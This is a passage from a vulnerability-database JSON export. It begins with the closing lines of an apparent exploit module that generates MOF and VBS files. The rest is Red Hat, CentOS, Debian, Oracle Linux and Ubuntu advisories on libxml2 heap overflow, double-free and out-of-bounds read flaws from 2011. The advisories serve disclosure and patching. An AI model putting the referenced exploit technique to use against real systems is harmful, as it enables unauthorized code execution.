file...\")\r\n\t\t@mof_content = generate_mof(@mof_name, @vbs_name)\r\n\t\tsuper\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17993/"}], "redhat": [{"lastseen": "2018-12-11T17:41:56", "bulletinFamily": "unix", "description": "The libxml2 library is a development toolbox providing the implementation\nof various XML standards. One of those standards is the XML Path Language\n(XPath), which is a language for addressing parts of an XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded\nentity references with long names. A remote attacker could provide a\nspecially-crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was found in\nthe way libxml2 parsed certain XML files. A remote attacker could provide a\nspecially-crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions. If an\nattacker were able to supply a specially-crafted XML file to an application\nusing libxml2, as well as an XPath expression for that application to run\nagainst the crafted file, it could cause the application to crash.\n(CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way that\nwould allow the CVE-2011-2834 flaw to be exploited; however, third-party\napplications may allow XPath expressions to be passed which could trigger\nthis flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote attacker\ncould provide a specially-crafted XML file that, when opened in an\napplication linked against libxml2, would cause the application to crash.\n(CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The desktop must\nbe restarted (log out, then log back in) for this update to take effect.\n", "modified": "2017-09-08T12:17:23", "published": "2012-01-11T05:00:00", "id": "RHSA-2012:0016", "href": "https://access.redhat.com/errata/RHSA-2012:0016", "type": "redhat", "title": "(RHSA-2012:0016) Important: libxml2 security update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-12T14:46:15", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2012:0016\n\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. One of those standards is the XML Path Language\n(XPath), which is a language for addressing parts of an XML document.\n\nA heap-based buffer overflow flaw was found in the way libxml2 decoded\nentity references with long names. A remote attacker could provide a\nspecially-crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-3919)\n\nAn off-by-one error, leading to a heap-based buffer overflow, was found in\nthe way libxml2 parsed certain XML files. A remote attacker could provide a\nspecially-crafted XML file that, when opened in an application linked\nagainst libxml2, would cause the application to crash or, potentially,\nexecute arbitrary code with the privileges of the user running the\napplication. (CVE-2011-0216)\n\nA flaw was found in the way libxml2 parsed certain XPath expressions. If an\nattacker were able to supply a specially-crafted XML file to an application\nusing libxml2, as well as an XPath expression for that application to run\nagainst the crafted file, it could cause the application to crash.\n(CVE-2011-2834)\n\nNote: Red Hat does not ship any applications that use libxml2 in a way that\nwould allow the CVE-2011-2834 flaw to be exploited; however, third-party\napplications may allow XPath expressions to be passed which could trigger\nthis flaw.\n\nAn out-of-bounds memory read flaw was found in libxml2. A remote attacker\ncould provide a specially-crafted XML file that, when opened in an\napplication linked against libxml2, would cause the application to crash.\n(CVE-2011-3905)\n\nAll users of libxml2 are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The desktop must\nbe restarted (log out, then log back in) for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-January/018369.html\n\n**Affected packages:**\nlibxml2\nlibxml2-devel\nlibxml2-python\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0016.html", "modified": "2012-01-11T13:47:59", "published": "2012-01-11T13:47:59", "href": "http://lists.centos.org/pipermail/centos-announce/2012-January/018369.html", "id": "CESA-2012:0016", "title": "libxml2 security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:15:00", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2394-1 security@debian.org\nhttp://www.debian.org/security/ Luciano Bello\nJanuary 27, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libxml2\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-0216 CVE-2011-2821 CVE-2011-2834 CVE-2011-3905 \n CVE-2011-3919 \nDebian Bug : 652352 643648 656377\n\nMany security problems had been fixed in libxml2, a popular library to handle\nXML data files.\n\nCVE-2011-3919:\nJ\u00c3\u00bcri Aedla discovered a heap-based buffer overflow that allows remote attackers\nto cause a denial of service or possibly have unspecified other impact via\nunknown vectors.\n\nCVE-2011-0216:\nAn Off-by-one error have been discoveried that allows remote attackers to \nexecute arbitrary code or cause a denial of service. \n\nCVE-2011-2821:\nA memory corruption (double free) bug has been identified in libxml2's XPath\nengine. Through it, it is possible to an attacker allows cause a denial of \nservice or possibly have unspecified other impact. This vulnerability does not\naffect the oldstable distribution (lenny).\n\nCVE-2011-2834:\nYang Dingning discovered a double free vulnerability related to XPath handling.\n\nCVE-2011-3905:\nAn out-of-bounds read vulnerability had been discovered, which allows remote\nattackers to cause a denial of service.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2.6.32.dfsg-5+lenny5.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2.7.8.dfsg-2+squeeze2.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 2.7.8.dfsg-7.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.7.8.dfsg-7.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2012-01-26T23:06:08", "published": "2012-01-26T23:06:08", "id": "DEBIAN:DSA-2394-1:72A72", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00018.html", "title": "[SECURITY] [DSA 2394-1] libxml2 security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:37:44", "bulletinFamily": "unix", "description": "[2.6.16-12.9.0.1]\n- Add oracle-enterprise.patch and replace doc/redhat.gif in the tarball\n[2.6.16-12.9]\n- Fix an off by one error in encoding CVE-2011-0216\n- Fix missing error status in XPath evaluation CVE-2011-2834\n- Make sure the parser returns when getting a Stop order CVE-2011-3905\n- Fix an allocation error when copying entities CVE-2011-3919\n- Resolves: rhbz#771904", "modified": "2012-01-11T00:00:00", "published": "2012-01-11T00:00:00", "id": "ELSA-2012-0016", "href": "http://linux.oracle.com/errata/ELSA-2012-0016.html", "title": "libxml2 security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:16", "bulletinFamily": "unix", "description": "It was discovered that libxml2 contained an off by one error. If a user or application linked against libxml2 were tricked into opening a specially crafted XML file, an attacker could cause the application to crash or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2011-0216)\n\nIt was discovered that libxml2 is vulnerable to double-free conditions when parsing certain XML documents. This could allow a remote attacker to cause a denial of service. (CVE-2011-2821, CVE-2011-2834)\n\nIt was discovered that libxml2 did not properly detect end of file when parsing certain XML documents. An attacker could exploit this to crash applications linked against libxml2. (CVE-2011-3905)\n\nIt was discovered that libxml2 did not properly decode entity references with long names. If a user or application linked against libxml2 were tricked into opening a specially crafted XML file, an attacker could cause the application to crash or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2011-3919)", "modified": "2012-01-19T00:00:00", "published": "2012-01-19T00:00:00", "id": "USN-1334-1", "href": "https://usn.ubuntu.com/1334-1/", "title": "libxml2 vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
